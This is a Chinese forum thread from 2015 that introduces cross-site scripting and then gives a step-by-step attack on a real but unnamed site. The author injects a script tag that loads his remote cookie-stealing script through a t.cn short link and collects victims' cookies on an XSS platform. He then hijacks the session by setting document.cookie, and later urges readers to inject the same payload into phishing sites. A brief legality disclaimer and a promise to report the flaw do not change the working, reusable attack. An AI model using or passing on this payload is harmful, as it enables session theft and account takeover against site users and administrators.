XSS技术介绍与攻击实例
XSS是跨站脚本攻击的别称(英文为Cross Site Scripting,但通常写成XSS以便于和另一项网页技术级联样式表CSS区分开),那么XSS技术可以用来干什么呢?



可以拿来盗号!!!!


就在几年前相信大家都有着这样的经历或者听说过这样的案例,点开某人的QQ空间后,自己的QQ账号就莫名其妙地去发一些H广告甚至被盗了,而就在去年,百度贴吧也是几乎一瞬间多了一堆奇怪的帖子,只要点进去后,自己的账号也开始自动开始狂发这种帖子,如果是吧务点进去后,大吧主会开掉小吧主,小吧主们互相封禁。。。。前者就是XSS攻击的实例,后者更为恶劣并且更加高级,这已经一种自动化并且能传播形式的攻击了,这就是XSS蠕虫。


盗号的受害者也并不一定是用户,因为网站的管理员也是一个超级用户,如果管理员被盗号,那么损失的是整个网站


现代的网页是由HTML语言和JavaScript脚本构成的,JavaScript可以嵌入到HTML文件里面,比如<script>alert("hello")</script>这样的语句,如果写到HTML文件里面,浏览器遇到<script></script>这样的标签就会执行里面的内容,这段代码是弹出一个窗口显示“hello”。


而网站或者论坛上面通常会有一些留言板块,这些板块的原理是把你写的内容提交到网站的数据库里面,然后第二个人浏览的时候,把数据库里面的信息查询出来返回给第二个用户浏览器,这个用户的浏览器在把这些内容渲染出来。
像下面的这个板块:
xss1.png




那么如果发帖的用户是黑阔,发的是一段JavaScript代码,如下面这样,第二个用户浏览了会怎么样呢?
xss2.png




结果是弹出一个框来
xss3.png

为什么会弹出框呢,可以关掉这个框用选中发帖内容右键-查看源代码看看黑阔发的贴变成了什么代码
xss4.jpg


看见没有,原来发的代码<script>alert()</script>变成了网页内容的一部分了,浏览器把它当做JavaScript命令执行了,自然会弹出一个框来。
但是我的这篇文章发了出来,里面有那么多<script>alert()</script>,为什么科创又不会弹出窗口呢?


原因是科创使用的phpwind系统在发帖的时候做了过滤,把尖括号给转义了,变成了<script>alert()</script>这样的代码,这样你的浏览器就把这些<script>alert()</script>当做普通文字处理了。这样你也就安全了。


如果只是弹一个框,感觉似乎没有什么用,可是我们把XSS语句改成这样的语句呢


<script src=http://t.cn/RLfh4wn></script>


从代码上看,这段语句调用 了一个不知名的网站上面的链接(t.cn是一个生成的短链接,可以用新浪生成),这个链接实际上是一个JavsScript脚本,它会干很多事情,其中就包括获取你的cookie,然后发送到另一个网站上面去。
这段脚本在后台悄悄地执行,不会弹框,你不会发现任何痕迹。


黑阔获取了你的cookie之后,就可以利用你的cookie伪造登陆,然后动用你的账号做任何事情了


http://webxss.cn/sqSVey?1437141780

[修改于 4 年前 - 2015-07-17 23:16:22]

来自 软件综合
 
2015-7-17 22:21:38
smith(作者)
1楼
说了这么多,实践在哪里呢,下面随便找个网站开干,但首先你需要一个xss平台,这一类的平台很多,因为都是用开源的程序开发的,可以在百度 xss 平台,当然你也可以用开源的代码自己搭建一个,不过需要提供域名和服务器,前者往往需要实名备案,这样很容易找到你。
下面是我使用的xss平台


xss5.jpg



在“我的项目”那里创建一个项目,如getcookie2,点击下一步,选择模块,我只需要cookie所以选择默认模块就行了
xss6.jpg

配置好后,点击浏览代码,上面会介绍你怎么插入xss语句:
xss7.jpg




复制这些语句,如下面的两条,然后再去找可以XSS的网站
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
2楼
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句

xss8.jpg
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
3楼
点击回复,我们的语句被插入进去了,可以看见并没有任何的script标签回显,xss语句被隐藏了

xss9.jpg
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
4楼
我们再看看代码变成什么了,<script></script>标签已经被解析了

xss10.jpg
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
5楼
接下来你要做的事情,就是等,明天定时登陆xss平台看看,因为一旦有人浏览了这个网页,包括你自己,就会把他的cookie发过来,为了验证方便我用另一台电脑访问了一下这个页面,没过多久后,xss平台有反应了,刷新一个,新增加了一条记录:
xss11.jpg



于是我们就把另一个用户的cookie拿到手了,接下来该怎样呢,当然是打开浏览器,修改cookie登陆上去
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
6楼
修改cookie的方法很多,firefox和Chrome的很多插件都可以用来修改cookie,在Chrome中可以用控制台来替换修改,如下图,按F12用document.cookie命令修改cookie
xss12.jpg
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
7楼
修改cookie之后,按下F5刷新页面,这样你就成功欺骗服务器变成了受害的用户了,然后,你可以使用这个账号做任何事情,如果中招的是管理员,那么你就有完全控制这个网站的权利了
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
8楼
最后,强调一下,XSS威力强大,但不要拿去做违法的行为,我国对计算机安全的管理严格。

这个网站的XSS漏洞会报告给乌云,补天等白帽子社区,珍惜一个安全的网络环境,谢谢
折叠评论
加载评论中,请稍候...
折叠评论
2015-07-18 06:19:16
9楼
楼主讲的不错,很清楚,很容易看懂
折叠评论
加载评论中,请稍候...
折叠评论
10楼
讲的通俗易懂,,即使没有基础的同学恐怕也看得懂吧。。
折叠评论
加载评论中,请稍候...
折叠评论
11楼
我发现你好像啥都懂,啥都搞,好厉害的的样子,佩服
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
12楼
引用 wenjizu:
我发现你好像啥都懂,啥都搞,好厉害的的样子,佩服
见笑了,这些算是小技吧,人非生而知之,不断学习
折叠评论
加载评论中,请稍候...
折叠评论
13楼
引用 smith:
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句
卧槽,是“多说”留言插件,很多网站都用了
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
14楼
引用 celeron533:
卧槽,是“多说”留言插件,很多网站都用了
没在意这个网站插件的版本,估计也是比较旧的版本吧,如果最新的也有那就给人玩烂了。

不过出xss也不是什么怪事,像黑客基地这样的网站,一些提交的地方都给人插过,总体来说防护这方面的防护还是有很多松懈
折叠评论
加载评论中,请稍候...
折叠评论
15楼
弹个框不能算跨站
折叠评论
加载评论中,请稍候...
折叠评论
2015-07-19 16:27:11
16楼
我拿自己的网站试了一下,真的能插。好危险。。。
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
17楼
顺便说一下下次大家遇到钓鱼诈骗的网站,就在地址等信息的地方填XSS语句,填
<script src="http://t.cn/RLfh4wn"></script>
这样的,不要填Alert,不要输入自己的真实信息

xxxxx.png


然后骗子看到信息之后就把cookie发过来,接着登陆他的网站,玩坏他
折叠评论
加载评论中,请稍候...
折叠评论
18楼
引用 smith:
顺便说一下下次大家遇到钓鱼诈骗的网站,就在地址等信息的地方填XSS语句,填
<script src="http://t.cn/RLfh4wn"></script>
这样的,不要填Alert,不要输入自己的真实信息



然后骗子...
看了一下http://t.cn/RLfh4wn   没看懂
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
19楼
引用 cccyl:
看了一下http://t.cn/RLfh4wn   没看懂
这个是我的xss脚本地址,你需要自己去申请一个,webxss.cn这些都可以
折叠评论
加载评论中,请稍候...
折叠评论
20楼
引用 smith:
这个是我的xss脚本地址,你需要自己去申请一个,webxss.cn这些都可以
我的意思是没看懂你的脚本,毕竟不是专业的
折叠评论
加载评论中,请稍候...
折叠评论
2015-07-20 00:15:36
21楼
我也是业余,看不懂
折叠评论
加载评论中,请稍候...
折叠评论
22楼
飘过  看不懂
折叠评论
加载评论中,请稍候...
折叠评论
2015-07-21 14:55:04
23楼
真心觉得楼主厉害。
折叠评论
加载评论中,请稍候...
折叠评论
2015-07-23 13:08:18
2015-7-23 13:08:18
24楼
引用 smith:
如下面这个网站,存在XSS漏洞,为了避免大家玩坏这个网站,我不暴露这个网站的站名
我们在回复中加入XSS语句
感觉好熟悉,似乎是某某医保网站
折叠评论
加载评论中,请稍候...
折叠评论
2015-07-24 01:10:17
25楼
楼主能给弄个乌云的账号吗?
折叠评论
加载评论中,请稍候...
折叠评论
26楼
额 这有点和谐= =
。。。。。。我是谁不重要 和谐社会最重要[s:;P]
折叠评论
加载评论中,请稍候...
折叠评论
27楼
楼主真是无一不通啊
折叠评论
加载评论中,请稍候...
折叠评论
smith(作者)
28楼
引用 哈哈哥:
楼主能给弄个乌云的账号吗?
做路人甲就行了,乌云是个不错的平台——我也是路人甲,有时候没必要去争那个名,做个灰帽子娱乐娱乐就行了
折叠评论
加载评论中,请稍候...
折叠评论
2015-07-27 21:33:25
2015-7-27 21:33:25
29楼
要是往别人的账号私信里插呢?
折叠评论
加载评论中,请稍候...
折叠评论
2015-08-04 06:38:27
2015-8-4 06:38:27
30楼
不明觉厉啊[s::lol]
折叠评论
加载评论中,请稍候...
折叠评论
2015-09-20 20:18:18
2015-9-20 20:18:18
31楼
C语言起步中。。。。。。。。。。。。。。。。。。。。。
折叠评论
加载评论中,请稍候...
折叠评论
2016-01-21 21:20:38
2016-1-21 21:20:38
32楼
不懂啊,小白一个
折叠评论
加载评论中,请稍候...
折叠评论
2016-01-22 11:11:28
33楼
嗯,看起来很实用
折叠评论
加载评论中,请稍候...
折叠评论
34楼
拿站常用方法之一,不只可以拿来盗号呢,表示在这里看到这个真的很暖心。。。
从我的名字也可以看出我原本是混哪的铪铪。。。
折叠评论
加载评论中,请稍候...
折叠评论
35楼
一般来说玩XSS攻击的时候都是用留言框插入COOKIE劫持语句然后发给管理员,把它指向到自己空间,然后用菜刀拿站的呢。。。
楼主的方法真是有趣
折叠评论
加载评论中,请稍候...
折叠评论
2016-01-31 15:53:01
2016-1-31 15:53:01
36楼
XSS  CSRF攻击方法在国外都好多年了,在国内熟练起来也就几年前,特别是这几年越发多的相关攻击实例。读者们可以去各种SRC去瞅瞅看的涨点恣势Orz楼主搞得不错
折叠评论
加载评论中,请稍候...
折叠评论
37楼
qq经常有 每次都是大批好友中招
折叠评论
加载评论中,请稍候...
折叠评论

想参与大家的讨论?现在就 登录 或者 注册

插入资源
全部
图片
视频
音频
附件
全部
未使用
已使用
正在上传
空空如也~
上传中..{{f.progress}}%
处理中..
上传失败,点击重试
{{f.name}}
空空如也~
(视频){{r.oname}}
{{selectedResourcesId.indexOf(r.rid) + 1}}
ID:{{user.uid}}
{{user.username}}
{{user.info.certsName}}
{{user.description}}
{{format("YYYY/MM/DD", user.toc)}}注册,{{fromNow(user.tlv)}}活动
{{submitted?"":"投诉"}}
请选择违规类型:
{{reason.description}}
支持的图片格式:jpg, jpeg, png